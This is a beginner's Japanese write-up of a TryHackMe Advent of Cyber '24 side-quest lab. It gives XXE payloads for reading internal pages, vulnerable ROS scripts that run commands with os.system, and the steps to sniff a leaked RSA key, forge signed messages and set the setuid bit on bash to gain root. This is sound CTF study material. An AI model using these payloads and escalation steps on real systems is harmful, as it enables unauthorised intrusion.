0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

[TryHackMe] Advent of Cyber '24 — Side Quest 2: T2: Yin and Yang [Writeup]

Last updated at Posted at 2025-01-04

000.png

TryHackMeで開催されたAdbent of Cyber '24のSide QuestのWriteupです。
筆者はセキュリティ勉強歴3ヵ月弱の初心者ハッカーです。
イベントに参加した記録として初めてWriteupを書いてみます。
すべての問題を自力で解いたわけではないことと、他の方の解法を参考にしている箇所があることをご承知おきください。

T2 Keycard

T2 KeycardはMain QuestのDay5から見つけられます。
Day5のテーマはXXE(外部実態参照)です。

内部サービスが動いているか調べると8080番ポートでApacheが動いているようです。

XXE payload
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1:8080"> ]>
<wishlist>
 <user_id>1</user_id>
 <item>
  <product_id>
   &payload;
  </product_id>
 </item>
</wishlist>

001.png
これをbase64でデコードすると、/access.logというページがあるようです。
見に行ってみましょう。

XXE payload
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1:8080/access.log"> ]>
<wishlist>
 <user_id>1</user_id>
 <item>
  <product_id>
   &payload;
  </product_id>
 </item>
</wishlist>

002.png
base64でデコードすると、/k3yZZZZZZZZZ/t2_sm1L3_4nD_w4v3_boyS.pngなるページにGETをリクエストするログがありました。
http://MACHINE_IP/k3yZZZZZZZZZ/t2_sm1L3_4nD_w4v3_boyS.pngにアクセスすると、T2 Keycardが得られました。
003.png

Yin and Yang

マシンはYinとYangの二台あります。
同時に2台起動しましょう。

Break Firewall

nmapを行います。

console
$ nmap -sC -sV -A -p- -Pn -T4 --min-rate 5000 -v -oN nmap 10.10.153.234
# Nmap 7.94SVN scan initiated Fri Dec  6 09:55:57 2024 as: /usr/lib/nmap/nmap --privileged -sC -sV -A -p- -Pn -T4 --min-rate 5000 -v -oN nmap 10.10.153.234
Nmap scan report for 10.10.153.234
Host is up (0.27s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
21337/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.10)
| http-methods: 
|_  Supported Methods: HEAD GET OPTIONS
|_http-title: Your Files Have Been Encrypted
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 40.364 days (since Sun Oct 27 01:12:39 2024)
Network Distance: 5 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 21337/tcp)
HOP RTT       ADDRESS
1   142.79 ms 10.17.0.1
2   ... 4
5   269.69 ms 10.10.153.234

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec  6 09:56:49 2024 -- 1 IP address (1 host up) scanned in 51.77 seconds

21337番ポートが空いているので見に行きます。
004.png
Decryption KeyにT2 Keycardのコードを入力することで、firewallを解除しssh接続ができるようになります。

注意
firewallを解除する前にssh接続を行うと、firewall解除後もssh接続できなくなることがあります。
その場合はマシンを起動しなおしてください。

Yin側、Yang側両方でそれぞれfirewallを解除しssh接続をします。

Establish ROS Connection

Yin側でsudo -lを実行してみます。

yin $ sudo -l
Matching Defaults entries for yin on ip-10-10-43-25:
    mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, always_set_home

User yin may run the following commands on ip-10-10-43-25:
    (root) NOPASSWD: /catkin_ws/yin.sh

/catkin_ws/yin.shを見てみます。

yin $ cat /catkin_ws/yin.sh
#!/usr/bin/bash

source /opt/ros/noetic/setup.bash
source /catkin_ws/devel/setup.bash

rosrun yin runyin.py

/catkin_ws/src/yin/scripts以下にrunyin.pyがあるので見てみると、ROSを用いた通信をYingと行うスクリプトのようです。

Yang側でも同じようなスクリプトが/catkin_ws/sec/yang/scripts/runyang.pyとしてあります。
どちらもsudoでroot権限で動かせるので、これを利用してフラグを取りに行きます。

問題の説明文にあるようにYinとYangはROSで通信を行います。

この記事が参考になりました。
片方をmaster、もう一方をslaveとする必要があるので、今回はYinをmaster、Yangをslaveとすることにします。

まずYin、Yang両側でで環境変数の設定を行います。

yin $ export ROS_MASTER_URI=http://<YIN_IP>:11311
yin $ export ROS_IP=<YIN_IP>
yang $ export ROS_MASTER_URI=http://<YIN_IP>:11311
yang $ export ROS_IP=<YANG_IP>

YinとYangを間違えないように気を付けてください。

環境変数設定が出来たら、master側であるYin側でrosを起動します。

yin $ roscore

roscoreを実行したら、新しいターミナルからYinにssh接続します。
最終的にはYin側で3つ、Yang側で2つの合計5つのssh接続のターミナルが必要になります。

新しく開いたYin側のターミナルでyin.shを実行してみます。

yin $ sudo /catkin_ws/yin.sh

エラーが表示されなければ正常です。

今度は、Yang側のターミナルからyang.shを実行してみます。

yang $ sudo /catkin_ws/yang.sh

すると以下のようなエラーが発生します。

[ERROR] [1735813233.857662]: Unable to immediately register with master node [http://localhost:11311]: master may not be running yet. Will keep trying.

ROS_MASTER_URIを設定しましたが、yang.shを実行した際にはmasterとしてlocalhostが参照されているようです。

ここで/etc/hostsを見てみると、なんとwriteableになっていました。

yang $ ls -l /etc/hosts
-rwxrwxrwx 1 root root 221 Nov 28 21:38 /etc/hosts

ということで/etc/hostsを編集して<YIN_IP> localhostとしておきます。
この状態でYang側で`yang.sh'を実行すると以下のようになります。

yang $ sudo /catkin_ws/yang.sh
Time difference is acceptable to answer message and not a replay
Time difference is acceptable to answer message and not a replay
Time difference is acceptable to answer message and not a replay
...

YinとYangの間でROSを使用した通信が成功したようです。

Look for Vulnerabilities

runyin.pyrunyang.pyでどのような処理が行われているか確認します。

runyin.py
#!/usr/bin/python3

import rospy
import base64
import codecs
import os
from std_msgs.msg import String
from yin.msg import Comms
from yin.srv import yangrequest
import hashlib
from Cryptodome.Signature import PKCS1_v1_5
from Cryptodome.PublicKey import RSA
from Cryptodome.Hash import SHA256

class Yin:
    def __init__(self):
        
        self.messagebus = rospy.Publisher('messagebus', Comms, queue_size=50)


        #Read the message channel private key
        pwd = b'secret'
        with open('/catkin_ws/privatekey.pem', 'rb') as f:
            data = f.read()
            self.priv_key = RSA.import_key(data,pwd)

        self.priv_key_str = self.priv_key.export_key().decode()

        rospy.init_node('yin')

        self.prompt_rate = rospy.Rate(0.5)

        #Read the service secret
        with open('/catkin_ws/secret.txt', 'r') as f:
            data = f.read()
            self.secret = data.replace('\n','')

        self.service = rospy.Service('svc_yang', yangrequest, self.handle_yang_request)

    def handle_yang_request(self, req):
        # Check secret first
        if req.secret != self.secret:
            return "Secret not valid"

        sender = req.sender
        receiver = req.receiver
        action = req.command

        os.system(action)

        response = "Action performed"

        return response


    def getBase64(self, message):
        hmac = base64.urlsafe_b64encode(message.timestamp.encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(message.sender.encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(message.receiver.encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(str(message.action).encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(str(message.actionparams).encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(message.feedback.encode()).decode()
        return hmac

    def getSHA(self, hmac):
        m = hashlib.sha256()
        m.update(hmac.encode())
        return str(m.hexdigest())  

    #This function will craft the signature for the message based on the specific system being talked to
    def sign_message(self, message):
        hmac = self.getBase64(message)
        hmac = SHA256.new(hmac.encode('utf-8'))
        signature = PKCS1_v1_5.new(self.priv_key).sign(hmac)
        sig = base64.b64encode(signature).decode()
        message.hmac = sig
        return message

    def craft_ping(self, receiver):
        message = Comms()
        message.timestamp = str(rospy.get_time())
        message.sender = "Yin"
        message.receiver = receiver
        message.action = 1
        message.actionparams = ['touch /home/yang/yin.txt']
        #message.actionparams.append(self.priv_key_str)
        message.feedback = "ACTION"
        message.hmac = ""
        return message

    def send_pings(self):
        # Yang
        message = self.craft_ping("Yang")
        message = self.sign_message(message)
        self.messagebus.publish(message)

    def run_yin(self):
        while not rospy.is_shutdown():
            self.send_pings()
            self.prompt_rate.sleep()

if __name__ == '__main__':
    try:
        yin = Yin()
        yin.run_yin()

    except rospy.ROSInterruptException:
        pass

注目するのはhandle_yang_request()です

def handle_yang_request(self, req):
        # Check secret first
        if req.secret != self.secret:
            return "Secret not valid"

        sender = req.sender
        receiver = req.receiver
        action = req.command

        os.system(action)

        response = "Action performed"

        return response

os.system(action)が実行されています。
有効性の確認に用いられるself.secret__init__()で読み込まれています。

def __init__(self):

        self.messagebus = rospy.Publisher('messagebus', Comms, queue_size=50)
        
        #[...]

        #Read the service secret
        with open('/catkin_ws/secret.txt', 'r') as f:
            data = f.read()
            self.secret = data.replace('\n','')

        self.service = rospy.Service('svc_yang', yangrequest, self.handle_yang_request)

つまり/catkin_ws/secret.txtを手に入れることができれば、/svc_yangというサービスを呼び出すことでYin側で任意のコマンドが実行できそうです。

次にrunyang.pyを見てみます。

runyang.py
#!/usr/bin/python3

import rospy
import base64
import codecs
import os
from std_msgs.msg import String
from yang.msg import Comms
from yang.srv import yangrequest
import hashlib
from Cryptodome.Signature import PKCS1_v1_5
from Cryptodome.PublicKey import RSA
from Cryptodome.Hash import SHA256

class Yang:
    def __init__(self):
        
        self.messagebus = rospy.Publisher('messagebus', Comms, queue_size=50)


        #Read the message channel private key
        pwd = b'secret'
        with open('/catkin_ws/privatekey.pem', 'rb') as f:
            data = f.read()
            self.priv_key = RSA.import_key(data,pwd)

        self.priv_key_str = self.priv_key.export_key().decode()

        rospy.init_node('yang')

        self.prompt_rate = rospy.Rate(0.5)

        #Read the service secret
        with open('/catkin_ws/secret.txt', 'r') as f:
            data = f.read()
            self.secret = data.replace('\n','')

        rospy.Subscriber('messagebus', Comms, self.callback)

    def callback(self, data):
        #First check to do is see if this is a message for us and one we need to respond to
        if (data.receiver != "Yang"):
            return

        #Now we know the message is for us. We can start system checks to see if it is a valid message
        if (not self.validate_message(data)):
            print ("Message could not be validated")
            return

        #Now we can action the message and send a reply
        for action in data.actionparams:
            os.system(action)

        #Now request an action from Yin
        self.yin_request()

        #Send reply
        reply = Comms()
        reply.timestamp = str(rospy.get_time())
        reply.sender = "Yang"
        reply.receiver = "Yin"
        reply.action = 2
        reply.actionparams = []
        reply.actionparams.append(self.priv_key_str)
        reply.feedback = "Action Done"
        reply.hmac = ""

        reply = self.sign_message(reply)

        self.messagebus.publish(reply)

    def validate_message(self, message):
        valid = True
        #Only accept messages from the allfather
        if (message.sender != "Yin"):
            valid = False
            print ("Message is not from Yin")
            return valid

        #First we need to validate the timestamp. The difference should not be bigger than threshold
        current_time = str(rospy.get_time())
        current_time_sec = int(current_time.split('.')[0])
        current_time_nsec = int(current_time.split('.')[1])
        message_time_sec = int(message.timestamp.split('.')[0])
        message_time_nsec = int(message.timestamp.split('.')[1])

        second_diff = current_time_sec - message_time_sec
        nsecond_diff = current_time_nsec - message_time_nsec

        if (second_diff <= 1):
            print ("Time difference is acceptable to answer message and not a replay")
        else:
            print ("Message is a replay and should be discarded")
            valid = False
            return valid
            # Here we want to respond and say that time is not acceptable thus regarded as replay

        #Now we need to validate the signature
        hmac = self.getBase64(message)
        hmac = SHA256.new(hmac.encode('utf-8'))
        signature = PKCS1_v1_5.new(self.priv_key).sign(hmac)
        sig = base64.b64encode(signature).decode()

        if (message.hmac != sig):
            print ("Signature verification failed")
            valid = False
            # Respond and say signature failed

        return valid

    def yin_request(self):
        resp = ""
        rospy.wait_for_service('svc_yang')
        try:
            service = rospy.ServiceProxy('svc_yang', yangrequest)
            response = service(self.secret, 'touch /home/yin/yang.txt', 'Yang', 'Yin')
        except rospy.ServiceException as e:
            print ("Failed: %s"%e)
        resp = response.response
        return resp


    def handle_yang_request(self, req):
        # Check secret first
        if req.secret != self.secret:
            return "Secret not valid"

        sender = req.sender
        receiver = req.receiver
        action = req.action

        os.system(action)

        response = "Action performed"

        return response

    def getBase64(self, message):
        hmac = base64.urlsafe_b64encode(message.timestamp.encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(message.sender.encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(message.receiver.encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(str(message.action).encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(str(message.actionparams).encode()).decode()
        hmac += "."
        hmac += base64.urlsafe_b64encode(message.feedback.encode()).decode()
        return hmac

    def getSHA(self, hmac):
        m = hashlib.sha256()
        m.update(hmac.encode())
        return str(m.hexdigest())  

    #This function will craft the signature for the message based on the specific system being talked to
    def sign_message(self, message):
        hmac = self.getBase64(message)
        hmac = SHA256.new(hmac.encode('utf-8'))
        signature = PKCS1_v1_5.new(self.priv_key).sign(hmac)
        sig = base64.b64encode(signature).decode()
        message.hmac = sig
        return message

    def run_yang(self):
        rospy.spin()

if __name__ == '__main__':
    try:
        yang = Yang()
        yang.run_yang()

    except rospy.ROSInterruptException:
        pass

runyang.pyには任意のコマンドが実行できそうな箇所が2つあります。
callback()handle_yang_request()です。

handle_yang_request()ではrunyin.pyと同様、/catkin_ws/secret.txtが必要となりますが、callbadk()内で行われるバリデーションにはself.priv_keyを用いているようです。

def callback(self, data):
        #First check to do is see if this is a message for us and one we need to respond to
        if (data.receiver != "Yang"):
            return

        #Now we know the message is for us. We can start system checks to see if it is a valid message
        if (not self.validate_message(data)):
            print ("Message could not be validated")
            return

        #Now we can action the message and send a reply
        for action in data.actionparams:
            os.system(action)

        # [...]

        self.messagebus.publish(reply)
def validate_message(self, message):
        valid = True
        #Only accept messages from the allfather
        if (message.sender != "Yin"):
            valid = False
            print ("Message is not from Yin")
            return valid

        # [...]

        #Now we need to validate the signature
        hmac = self.getBase64(message)
        hmac = SHA256.new(hmac.encode('utf-8'))
        signature = PKCS1_v1_5.new(self.priv_key).sign(hmac)
        sig = base64.b64encode(signature).decode()

        if (message.hmac != sig):
            print ("Signature verification failed")
            valid = False
            # Respond and say signature failed

        return valid

self.priv_key__init__()内で/catkin_ws/privatekey.pemから読み込まれています。
つまり/catkin_ws/privatekey.pemを手に入れることができれば、YinからYangへのメッセージを偽装しYang側で任意のコードが実行できそうです。

ここでcallback()をよく見ると/catkin_ws/privatekey.pemself.priv_key_strとして平文で送信しています。

def callback(self, data):
        # [...]

        #Send reply
        reply = Comms()
        reply.timestamp = str(rospy.get_time())
        reply.sender = "Yang"
        reply.receiver = "Yin"
        reply.action = 2
        reply.actionparams = []
        reply.actionparams.append(self.priv_key_str)
        reply.feedback = "Action Done"
        reply.hmac = ""

        reply = self.sign_message(reply)

        self.messagebus.publish(reply)

通信の中身を見ることができれば、/catkin_ws/privatekey.pemが手に入りそうです。

Get Confidential Information

runyin.pyrunyang.pyによると、通信は/messagebusというトピックを通じて行われているようです。

YinとYangそれぞれのターミナルを以下の状態にして、rostopicを見てみましょう。

  • Yin
    • roscore
    • sudo /catkin_ws/yin.sh
    • rostopic
  • Yang
    • sudo /catkin_ws/yang.sh
    • rostopic
yin/yang $ rostopic list
/messagebus
/rosout
/rosout_agg

YinとYangの両方で/messagebusでやり取りしている情報を見てみます。

yin/yang $ rostopic echo /messagebus

YangからYinにRSAの秘密鍵が送信されているのが確認できました。
005.png

これを/tmp/privatekey.pemとして保存しておきます。

この秘密鍵を利用してYinからYangへ通信を送ればYang側で任意のコマンドが実行できるはずです。

Privilege Escalation

Yinのrunyin.py/tmp/exploit.pyにコピーして書き換えます。

yin $ cp /catkin_ws/src/yin/scripts/runyin.py /tmp/exploit.py

006.png
秘密鍵の参照先を変更します。

pwd = b'secret'
-       with open('/catkin_ws/privatekey.pem', 'rb') as f:
+       with open('/tmp/privatekey.pem', 'rb') as f:
            data = f.read()
            self.priv_key = RSA.import_key(data,pwd)

        self.priv_key_str = self.priv_key.export_key().decode()

        rospy.init_node('yin')

        self.prompt_rate = rospy.Rate(0.5)

コピーしたexploit.pyには/catkin_ws/secret.txtを参照する権限がないので適当な文字列に変更しておきます。

- with open('/catkin_ws/secret.txt', 'r') as f:
-             data = f.read()
-             self.secret = data.replace('\n','')
+ self.secret = "test"

実行するコマンドを変更します。

def craft_ping(self, receiver):
        message = Comms()
        message.timestamp = str(rospy.get_time())
        message.sender = "Yin"
        message.receiver = receiver
        message.action = 1
-       message.actionparams = ['touch /home/yang/yin.txt']
+       message.actionparams = ['chmod +s /bin/bash']
        #message.actionparams.append(self.priv_key_str)
        message.feedback = "ACTION"
        message.hmac = ""
        return message

Yin側でroscoreが実行されていることを確認して、エクスプロイトを実行します。

yang $ sudo /catkin_ws/yang.sh
yin $ python3 /tmp/exploit.py

Yang側で以下のメッセージが表示されていることを確認してください。

Time difference is acceptable to answer message and not a replay

攻撃が成功したかYangで確認します。

yang $ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
yang $ /bin/bash -p
bash-5.0# id
uid=1002(yang) gid=1002(yang) euid=0(root) egid=0(root) groups=0(root),1002(yang)

これでYangのrootが取れました。
yang.txt/rootにあります。

bash-5.0# cat /root/yang.txt 
THM{[...]}

また、root権限があるので/catkin_ws/secret.txtも手に入ります。

bash-5.0# cat /catkin_ws/secret.txt
th[...]ss

secret.txtを使ってYinにサービスを実行させます。
Yin側でyin.shを実行し、別のターミナルからサービスを呼び出します。

yin $ sudo /catkin_ws/yin.sh
yin $ rosservice call /svc_yang "{secret: 'th[...]ss', command: 'cat /root/yin.txt', sender: 'Yang', receiver: 'Yin'}"

yin.shを実行したターミナルにyin.txtが表示されているはずです。

yin $ sudo /catkin_ws/yin.sh 
THM{[...]}

参考

最後に

ROSの通信を確立させるのが一番大変でした。
先入観から、まさか/etc/hostsが編集可能であるとは思いませんでした。
/messagebusの通信内容さえ見れてしまえば、そこから先は早いですね。

Side Quest1
Side Quest3
Side Quest4(まだ)
Side Quest5(まだ)

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?